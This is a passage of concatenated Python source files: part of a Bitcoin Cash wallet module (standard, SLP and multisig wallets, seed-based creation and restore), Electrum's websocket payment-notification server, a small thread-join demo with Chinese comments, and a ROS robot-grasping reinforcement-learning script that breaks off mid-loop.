limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def __init__(self, storage):
super().__init__(storage)
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Slp_Standard_Wallet(Standard_Wallet):
wallet_type = 'slp_standard'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'slp_standard', 'multisig', 'slp_multisig', 'imported', 'slp_imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'slp_standard': Slp_Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'slp_imported_privkey': Slp_ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
'slp_imported_addr': Slp_ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
# Convert 'bip39-slp' wallet type to 'slp_standard' wallet type
if storage.get('wallet_type', '') == 'bip39-slp' or storage.get('wallet_type', '') == 'standard_slp':
storage.put('wallet_type', 'slp_standard')
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
websockets.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import queue
import threading, os, json
from collections import defaultdict
try:
from SimpleWebSocketServer import WebSocket, SimpleSSLWebSocketServer
except ImportError:
import sys
sys.exit("install SimpleWebSocketServer")
from . import util
request_queue = queue.Queue()
class ElectrumWebSocket(WebSocket):
def handleMessage(self):
assert self.data[0:3] == 'id:'
util.print_error("message received", self.data)
request_id = self.data[3:]
request_queue.put((self, request_id))
def handleConnected(self):
util.print_error("connected", self.address)
def handleClose(self):
util.print_error("closed", self.address)
class WsClientThread(util.DaemonThread):
def __init__(self, config, network):
util.DaemonThread.__init__(self)
self.network = network
self.config = config
self.response_queue = queue.Queue()
self.subscriptions = defaultdict(list)
def make_request(self, request_id):
# read json file
rdir = self.config.get('requests_dir')
n = os.path.join(rdir, 'req', request_id[0], request_id[1], request_id, request_id + '.json')
with open(n, encoding='utf-8') as f:
s = f.read()
d = json.loads(s)
addr = d.get('address')
amount = d.get('amount')
return addr, amount
def reading_thread(self):
while self.is_running():
try:
ws, request_id = request_queue.get()
except queue.Empty:
continue
try:
addr, amount = self.make_request(request_id)
except:
continue
l = self.subscriptions.get(addr, [])
l.append((ws, amount))
self.subscriptions[addr] = l
h = self.network.addr_to_scripthash(addr)
self.network.send([('blockchain.scripthash.subscribe', [h])], self.response_queue.put)
def run(self):
threading.Thread(target=self.reading_thread).start()
while self.is_running():
try:
r = self.response_queue.get(timeout=0.1)
except queue.Empty:
continue
util.print_error('response', r)
method = r.get('method')
params = r.get('params')
result = r.get('result')
if result is None:
continue
if method == 'blockchain.scripthash.subscribe':
self.network.send([('blockchain.scripthash.get_balance', params)], self.response_queue.put)
elif method == 'blockchain.scripthash.get_balance':
h = params[0]
addr = self.network.h2addr.get(h, None)
if addr is None:
util.print_error("can't find address for scripthash: %s" % h)
l = self.subscriptions.get(addr, [])
for ws, amount in l:
if not ws.closed:
if sum(result.values()) >=amount:
ws.sendMessage('paid')
class WebSocketServer(threading.Thread):
def __init__(self, config, ns):
threading.Thread.__init__(self)
self.config = config
self.net_server = ns
self.daemon = True
def run(self):
t = WsClientThread(self.config, self.net_server)
t.start()
host = self.config.get('websocket_server')
port = self.config.get('websocket_port', 9999)
certfile = self.config.get('ssl_chain')
keyfile = self.config.get('ssl_privkey')
self.server = SimpleSSLWebSocketServer(host, port, ElectrumWebSocket, certfile, keyfile)
self.server.serveforever()
|
thread_join.py
|
import threading
import time
"""
测试一下 python 多线程中 join 的功能:
测试结果显示,线程 A 加入 join 后,主线程会等待线程 A 执行完毕后再推出
如果不加 join,主线程不等线程 A 执行完就退出,也就是说,
join 的作用就是线程同步
"""
def run():
time.sleep(2)
print('当前线程的名字是: ', threading.current_thread().name)
time.sleep(2)
if __name__ == '__main__':
start_time = time.time()
print('这是主线程:', threading.current_thread().name)
thread_list = []
for i in range(5):
t = threading.Thread(target=run)
thread_list.append(t)
for t in thread_list:
t.setDaemon(True)
t.start()
for t in thread_list:
print("join")
#t.join()
print('主线程结束了!' , threading.current_thread().name)
print('一共用时:', time.time()-start_time)
|
ros_yolact_rl_grap_main.py
|
#!/usr/bin/env python
import time
import os
import random
import threading
import argparse
import matplotlib.pyplot as plt
import numpy as np
import scipy as sc
import cv2
from collections import namedtuple
import torch
from torch.autograd import Variable
from ros_yolact_rl_grap_robot import Robot
from trainer import Trainer
from logger import Logger
import utils
# ROS
import rospy
import rospkg
from std_msgs.msg import String
from ur_moveit_commands import UR_Moveit_API
from std_srvs.srv import SetBool, SetBoolResponse, SetBoolRequest
from rospy.numpy_msg import numpy_msg
from yolact_ros_msgs.msg import Detections
from yolact_ros_msgs.msg import Detection
from yolact_ros_msgs.msg import Box
from yolact_ros_msgs.msg import Mask
from yolact_ros_msgs.msg import GraspPt
def main(args):
# Can check log msgs according to log_level {rospy.DEBUG, rospy.INFO, rospy.WARN, rospy.ERROR}
rospy.init_node('ur5-grasping', anonymous=True, log_level=rospy.DEBUG)
ur_moveit_api = UR_Moveit_API(boundaries=True)
#ur_moveit_api.move_to_neutral()
'''
r = rospy.Rate(1) # 10hz
while not rospy.is_shutdown():
print ("current pose: ", ur_moveit_api.get_current_pose())
print ("current pose euler: ", ur_moveit_api.quat_to_euler(ur_moveit_api.get_current_pose().pose))
print ("current pose quat: ", ur_moveit_api.euler_to_quat(np.array([1.2, 1.2, -1.20])))
print ("current joint value: ", ur_moveit_api.get_joint_values())
r.sleep()
#ur_moveit_api.move_to_up()
'''
'''
pub = rospy.Publisher('test', numpy_msg(Floats),queue_size=10)
a = np.array([1.0, 2.1, 3.2, 4.3, 5.4, 6.5], dtype=np.float32)
pub.publish(a)
'''
# --------------- Setup options ---------------
is_sim = args.is_sim # Run in simulation?
obj_mesh_dir = os.path.abspath(args.obj_mesh_dir) if is_sim else None # Directory containing 3D mesh files (.obj) of objects to be added to simulation
num_obj = args.num_obj if is_sim else None # Number of objects to add to simulation
tcp_host_ip = args.tcp_host_ip if not is_sim else None # IP and port to robot arm as TCP client (UR5)
tcp_port = args.tcp_port if not is_sim else None
rtc_host_ip = args.rtc_host_ip if not is_sim else None # IP and port to robot arm as real-time client (UR5)
rtc_port = args.rtc_port if not is_sim else None
if is_sim:
workspace_limits = np.asarray([[-0.724, -0.276], [-0.224, 0.224], [-0.0001, 0.4]]) # Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
else:
#workspace_limits = np.asarray([[-0.5, -0.25], [-0.35, 0.35], [0.3, 0.40]]) # Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
#workspace_limits = np.asarray([[-0.724, -0.276], [-0.224, 0.224], [0.3, 0.50]]) # Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
workspace_limits = np.asarray([[-0.724, -0.276], [-0.3, 0.148], [0.2, 0.35]])
heightmap_resolution = args.heightmap_resolution # Meters per pixel of heightmap
random_seed = args.random_seed
force_cpu = args.force_cpu
# ------------- Algorithm options -------------
method = args.method # 'reactive' (supervised learning) or 'reinforcement' (reinforcement learning ie Q-learning)
push_rewards = args.push_rewards if method == 'reinforcement' else None # Use immediate rewards (from change detection) for pushing?
future_reward_discount = args.future_reward_discount
experience_replay = args.experience_replay # Use prioritized experience replay?
heuristic_bootstrap = args.heuristic_bootstrap # Use handcrafted grasping algorithm when grasping fails too many times in a row?
explore_rate_decay = args.explore_rate_decay
grasp_only = args.grasp_only
# -------------- Testing options --------------
is_testing = args.is_testing
max_test_trials = args.max_test_trials # Maximum number of test runs per case/scenario
test_preset_cases = args.test_preset_cases
test_preset_file = os.path.abspath(args.test_preset_file) if test_preset_cases else None
# ------ Pre-loading and logging options ------
load_snapshot = args.load_snapshot # Load pre-trained snapshot of model?
snapshot_file = os.path.abspath(args.snapshot_file) if load_snapshot else None
continue_logging = args.continue_logging # Continue logging from previous session
logging_directory = os.path.abspath(args.logging_directory) if continue_logging else os.path.abspath('logs')
save_visualizations = args.save_visualizations # Save visualizations of FCN predictions? Takes 0.6s per training step if set to True
# Set random seed
np.random.seed(random_seed)
# Initialize pick-and-place system (camera and robot)
robot = Robot(is_sim, obj_mesh_dir, num_obj, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
is_testing, test_preset_cases, test_preset_file)
# Initialize trainer
trainer = Trainer(method, push_rewards, future_reward_discount,
is_testing, load_snapshot, snapshot_file)
# Initialize data logger
logger = Logger(continue_logging, logging_directory)
logger.save_camera_info(robot.cam_intrinsics, robot.cam_pose, robot.cam_depth_scale) # Save camera intrinsics and pose
logger.save_heightmap_info(workspace_limits, heightmap_resolution) # Save heightmap parameters
# Find last executed iteration of pre-loaded log, and load execution info and RL variables
if continue_logging:
trainer.preload(logger.transitions_directory)
# Initialize variables for heuristic bootstrapping and exploration probability
no_change_count = [2, 2] if not is_testing else [0, 0] # heuristic_bootstrap, training = [2, 2], test = [0, 0], no_change_count[0]=push, [1]=grasp
explore_prob = 0.5 if not is_testing else 0.0
# Quick hack for nonlocal memory between threads in Python 2
nonlocal_variables = {'executing_action' : False,
'primitive_action' : None,
'best_pix_ind' : None,
'push_success' : False,
'grasp_success' : False}
# Get surface_pts for grasping based on Yolact
surface_pts = []
# Parallel thread to process network output and execute actions
# -------------------------------------------------------------
def process_actions():
while not rospy.is_shutdown():
if nonlocal_variables['executing_action']:
print('>>>>>>> executing_action start >>>>>>>>>>')
# Determine whether grasping or pushing should be executed based on network predictions
best_push_conf = np.max(push_predictions)
best_grasp_conf = np.max(grasp_predictions)
print('> Primitive confidence scores: %f (push), %f (grasp)' % (best_push_conf, best_grasp_conf))
nonlocal_variables['primitive_action'] = 'grasp'
explore_actions = False
if not grasp_only:
if is_testing and method == 'reactive':
if best_push_conf > 2*best_grasp_conf:
nonlocal_variables['primitive_action'] = 'push'
else:
if best_push_conf > best_grasp_conf:
nonlocal_variables['primitive_action'] = 'push'
explore_actions = np.random.uniform() < explore_prob
if explore_actions: # Exploitation (do best action) vs exploration (do other action)
print('> Strategy: explore (exploration probability: %f)' % (explore_prob))
nonlocal_variables['primitive_action'] = 'push' if np.random.randint(0,2) == 0 else 'grasp'
else:
print('> Strategy: exploit (exploration probability: %f)' % (explore_prob))
trainer.is_exploit_log.append([0 if explore_actions else 1])
logger.write_to_log('is-exploit', trainer.is_exploit_log)
# If heuristic bootstrapping is enabled: if change has not been detected more than 2 times, execute heuristic algorithm to detect grasps/pushes
# NOTE: typically not necessary and can reduce final performance.
if heuristic_bootstrap and nonlocal_variables['primitive_action'] == 'push' and no_change_count[0] >= 2:
print('> Change not detected for more than two pushes. Running heuristic pushing.')
nonlocal_variables['best_pix_ind'] = trainer.push_heuristic(valid_depth_heightmap)
no_change_count[0] = 0
predicted_value = push_predictions[nonlocal_variables['best_pix_ind']]
use_heuristic = True
elif heuristic_bootstrap and nonlocal_variables['primitive_action'] == 'grasp' and no_change_count[1] >= 2:
print('> Change not detected for more than two grasps. Running heuristic grasping.')
nonlocal_variables['best_pix_ind'] = trainer.grasp_heuristic(valid_depth_heightmap)
no_change_count[1] = 0
predicted_value = grasp_predictions[nonlocal_variables['best_pix_ind']]
use_heuristic = True
else:
print('> Running not heuristic action.')
use_heuristic = False
# Get pixel location and rotation with highest affordance prediction from heuristic algorithms (rotation, y, x)
if nonlocal_variables['primitive_action'] == 'push':
nonlocal_variables['best_pix_ind'] = np.unravel_index(np.argmax(push_predictions), push_predictions.shape) # https://stackoverflow.com/questions/48135736/what-is-an-intuitive-explanation-of-np-unravel-index/48136499
predicted_value = np.max(push_predictions)
elif nonlocal_variables['primitive_action'] == 'grasp':
nonlocal_variables['best_pix_ind'] = np.unravel_index(np.argmax(grasp_predictions), grasp_predictions.shape)
predicted_value = np.max(grasp_predictions)
trainer.use_heuristic_log.append([1 if use_heuristic else 0])
logger.write_to_log('use-heuristic', trainer.use_heuristic_log)
# Save predicted confidence value
trainer.predicted_value_log.append([predicted_value])
logger.write_to_log('predicted-value', trainer.predicted_value_log)
# Compute 3D position of pixel
print('> Action: %s at (best_pix_ind, best_pix_y, best_pix_x) = (%d, %d, %d) of pixel' % (nonlocal_variables['primitive_action'], nonlocal_variables['best_pix_ind'][0], nonlocal_variables['best_pix_ind'][1], nonlocal_variables['best_pix_ind'][2]))
best_rotation_angle = np.deg2rad(nonlocal_variables['best_pix_ind'][0]*(360.0/trainer.model.num_rotations))
best_pix_x = nonlocal_variables['best_pix_ind'][2]
best_pix_y = nonlocal_variables['best_pix_ind'][1]
# 3D position [x, y, depth] of cartesian coordinate, conveted from pixel
primitive_position = [best_pix_x * heightmap_resolution + workspace_limits[0][0], \
best_pix_y * heightmap_resolution + workspace_limits[1][0], \
valid_depth_heightmap[best_pix_y][best_pix_x] + workspace_limits[2][0]]
# If pushing, adjust start position, and make sure z value is safe and not too low
if nonlocal_variables['primitive_action'] == 'push': # or nonlocal_variables['primitive_action'] == 'place':
finger_width = 0.144
safe_kernel_width = int(np.round((finger_width/2)/heightmap_resolution))
local_region = valid_depth_heightmap[max(best_pix_y - safe_kernel_width, 0):min(best_pix_y + safe_kernel_width + 1, valid_depth_heightmap.shape[0]), max(best_pix_x - safe_kernel_width, 0):min(best_pix_x + safe_kernel_width + 1, valid_depth_heightmap.shape[1])]
if local_region.size == 0:
safe_z_position = workspace_limits[2][0]
else:
safe_z_position = np.max(local_region) + workspace_limits[2][0]
primitive_position[2] = safe_z_position
# Save executed primitive
if nonlocal_variables['primitive_action'] == 'push':
trainer.executed_action_log.append([0, nonlocal_variables['best_pix_ind'][0], nonlocal_variables['best_pix_ind'][1], nonlocal_variables['best_pix_ind'][2]]) # 0 - push
elif nonlocal_variables['primitive_action'] == 'grasp':
trainer.executed_action_log.append([1, nonlocal_variables['best_pix_ind'][0], nonlocal_variables['best_pix_ind'][1], nonlocal_variables['best_pix_ind'][2]]) # 1 - grasp
logger.write_to_log('executed-action', trainer.executed_action_log)
# Visualize executed primitive, and affordances
if save_visualizations:
push_pred_vis = trainer.get_prediction_vis(push_predictions, mask_color_heightmap, nonlocal_variables['best_pix_ind'])
logger.save_visualizations(trainer.iteration, push_pred_vis, 'push')
cv2.imwrite('visualization.push.png', push_pred_vis)
grasp_pred_vis = trainer.get_prediction_vis(grasp_predictions, mask_color_heightmap, nonlocal_variables['best_pix_ind'])
logger.save_visualizations(trainer.iteration, grasp_pred_vis, 'grasp')
cv2.imwrite('visualization.grasp.png', grasp_pred_vis)
# Initialize variables that influence reward
nonlocal_variables['push_success'] = False
nonlocal_variables['grasp_success'] = False
change_detected = False
# Execute primitive, robot act!!! 'push' or 'grasp'
print('> Action: %s at (x, y, z) = (%f, %f, %f) of 3D' % (nonlocal_variables['primitive_action'], primitive_position[0], primitive_position[1], primitive_position[2]))
print('> best_rotation_angle: %f of 3D' % (best_rotation_angle))
if nonlocal_variables['primitive_action'] == 'push':
nonlocal_variables['push_success'] = robot.push(primitive_position, best_rotation_angle, workspace_limits)
print('> Push successful: %r' % (nonlocal_variables['push_success']))
elif nonlocal_variables['primitive_action'] == 'grasp':
nonlocal_variables['grasp_success'] = robot.grasp(primitive_position, best_rotation_angle, workspace_limits)
#nonlocal_variables['grasp_success'] = robot.instance_seg_grasp(primitive_position, grasp_pt, workspace_limits, surface_pts)
print('> Grasp successful: %r' % (nonlocal_variables['grasp_success']))
nonlocal_variables['executing_action'] = False
print('>>>>>>> executing_action end >>>>>>>>>>')
time.sleep(0.01)
action_thread = threading.Thread(target=process_actions)
action_thread.daemon = True
action_thread.start()
exit_called = False
# -------------------------------------------------------------
# -------------------------------------------------------------
# Start main training/testing loop
while not rospy.is_shutdown():
print('\n ##### %s iteration: %d ##### ' % ('Testing' if is_testing else 'Training', trainer.iteration))
iteration_time_0 = time.time()
# Make sure simulation is still stable (if not, reset simulation)
if is_sim: robot.check_sim()
if not is_sim:
robot.go_wait_point()
# Get latest RGB-D image
color_img, depth_img = robot.get_camera_data()
depth_img = depth_img * robot.cam_depth_scale # Apply depth scale from calibration
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
color_heightmap, depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
surface_pts = utils.get_surface_pts(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose)
# Call service for receiving center of mass through Yolact based on ros
robot.start_yolact_eval_service()
grasp_pt = GraspPt()
grasp_pt = robot.get_grasp_pt_msg()
# For drawing gripper line
logger.save_image_with_grasp_line(trainer.iteration, color_img, grasp_pt)
detections = Detections()
detections = robot.get_detections_msg()
# For getting image based mask
mask_color_heightmap, mask_depth_heightmap = utils.get_mask_heightmap(detections, color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
valid_depth_heightmap = depth_heightmap.copy()
valid_depth_heightmap[np.isnan(valid_depth_heightmap)] = 0
valid_mask_depth_heightmap = mask_depth_heightmap.copy()
valid_mask_depth_heightmap[np.isnan(valid_mask_depth_heightmap)] = 0
# Save RGB-D images and RGB-D heightmaps, Mask heightmaps
logger.save_images(trainer.iteration, color_img, depth_img, '0')
logger.save_heightmaps(trainer.iteration, color_heightmap, valid_depth_heightmap, '0')
logger.save_mask_heightmaps(trainer.iteration, mask_color_heightmap, valid_mask_depth_heightmap, '0')
# Reset simulation or pause real-world training if table is empty
stuff_count = np.zeros(valid_depth_heightmap.shape)
stuff_count[valid_depth_heightmap > 0.02] = 1
#empty_threshold = 300
empty_threshold = 300
if is_sim and is_testing:
empty_threshold = 10
# If table is empty, start restart_real()
if np.sum(stuff_count) < empty_threshold or (is_sim and no_change_count[0] + no_change_count[1] > 10):
no_change_count = [0, 0]
cv2.imwrite('valid_depth_heightmap.png', valid_depth_heightmap)
if is_sim:
print('Not enough objects in view (value: %d)! Repositioning objects.' % (np.sum(stuff_count)))
robot.restart_sim()
robot.add_objects()
if is_testing: # If at end of test run, re-load original weights (before test run)
trainer.model.load_state_dict(torch.load(snapshot_file))
else:
print('Not enough stuff on the table (value: %d)! Flipping over bin of objects...' % (np.sum(stuff_count)))
robot.restart_real()
trainer.clearance_log.append([trainer.iteration])
logger.write_to_log('clearance', trainer.clearance_log)
if is_testing and len(trainer.clearance_log) >= max_test_trials:
exit_called = True # Exit after training thread (backprop and saving labels)
continue
# If test number is over max_test_trials, exit_called is True
if not exit_called:
# Run forward pass with network to get affordances
print("Run forward pass with network to get affordances!!!!!!")
push_predictions, grasp_predictions, state_feat = trainer.forward(mask_color_heightmap, valid_mask_depth_heightmap, is_volatile=True)
# Execute best primitive action on robot in another thread
nonlocal_variables['executing_action'] = True
# Run training iteration in current thread (aka "training thread")
if 'prev_color_img' in locals():
# Detect changes
depth_diff = abs(depth_heightmap - prev_depth_heightmap)
depth_diff[np.isnan(depth_diff)] = 0
depth_diff[depth_diff > 0.3] = 0
depth_diff[depth_diff < 0.01] = 0
depth_diff[depth_diff > 0] = 1 # sensing changed pixel when 0.01 < depth < 0.3 include
change_threshold = 300
change_value = np.sum(depth_diff)
change_detected = change_value > change_threshold or prev_grasp_success # if success
print('(Depth img) Change detected: %r (value: %d)' % (change_detected, change_value))
# If current depth img is changed from previous depth img after acting
if change_detected:
# Initialization
if prev_primitive_action == 'push':
no_change_count[0] = 0
elif prev_primitive_action == 'grasp':
no_change_count[1] = 0
else:
# If change is small, sweep cnt +1
if prev_primitive_action == 'push':
no_change_count[0] += 1
elif prev_primitive_action == 'grasp':
no_change_count[1] += 1
# Compute training labels
label_value, prev_reward_value = trainer.get_label_value(prev_primitive_action, prev_push_success, prev_grasp_success, change_detected, prev_push_predictions, prev_grasp_predictions, mask_color_heightmap, valid_mask_depth_heightmap)
trainer.label_value_log.append([label_value])
logger.write_to_log('label-value', trainer.label_value_log)
trainer.reward_value_log.append([prev_reward_value])
logger.write_to_log('reward-value', trainer.reward_value_log)
# Backpropagate
trainer.backprop(prev_color_heightmap, prev_valid_depth_heightmap, prev_primitive_action, prev_best_pix_ind, label_value)
# Adjust exploration probability
if not is_testing:
explore_prob = max(0.5 * np.power(0.9998, trainer.iteration),0.1) if explore_rate_decay else 0.5
# Do sampling for experience replay
if experience_replay and not is_testing:
sample_primitive_action = prev_primitive_action
if sample_primitive_action == 'push':
sample_primitive_action_id = 0
if method == 'reactive':
sample_reward_value = 0 if prev_reward_value == 1 else 1 # random.randint(1, 2) # 2
elif method == 'reinforcement':
sample_reward_value = 0 if prev_reward_value == 0.5 else 0.5
elif sample_primitive_action == 'grasp':
sample_primitive_action_id = 1
if method == 'reactive':
sample_reward_value = 0 if prev_reward_value == 1 else 1
elif method == 'reinforcement':
sample_reward_value = 0 if prev_reward_value == 1 else 1
# Get samples of the same primitive but with different results
sample_ind = np.argwhere(np.logical_and(np.asarray(trainer.reward_value_log)[1:trainer.iteration,0] == sample_reward_value, np.asarray(trainer.executed_action_log)[1:trainer.iteration,0] == sample_primitive_action_id))
if sample_ind.size > 0:
# Find sample with highest surprise value
if method == 'reactive':
sample_surprise_values = np.abs(np.asarray(trainer.predicted_value_log)[sample_ind[:,0]] - (1 - sample_reward_value))
elif method == 'reinforcement':
sample_surprise_values = np.abs(np.asarray(trainer.predicted_value_log)[sample_ind[:,0]] - np.asarray(trainer.label_value_log)[sample_ind[:,0]])
sorted_surprise_ind = np.argsort(sample_surprise_values[:,0])
sorted_sample_ind = sample_ind[sorted_surprise_ind,0]
pow_law_exp = 2
rand_sample_ind = int(np.round(np.random.power(pow_law_exp, 1)*(sample_ind.size-1)))
sample_iteration = sorted_sample_ind[rand_sample_ind]
print('Experience replay: iteration %d (surprise value: %f)' % (sample_iteration, sample_surprise_values[sorted_surprise_ind[rand_sample_ind]]))
# Load sample RGB-D heightmap
sample_color_heightmap = cv2.imread(os.path.join(logger.mask_color_heightmaps_directory, '%06d.0.color.png' % (sample_iteration)))
sample_color_heightmap = cv2.cvtColor(sample_color_heightmap, cv2.COLOR_BGR2RGB)
sample_depth_heightmap = cv2.imread(os.path.join(logger.mask_depth_heightmaps_directory, '%06d.0.depth.png' % (sample_iteration)), -1)
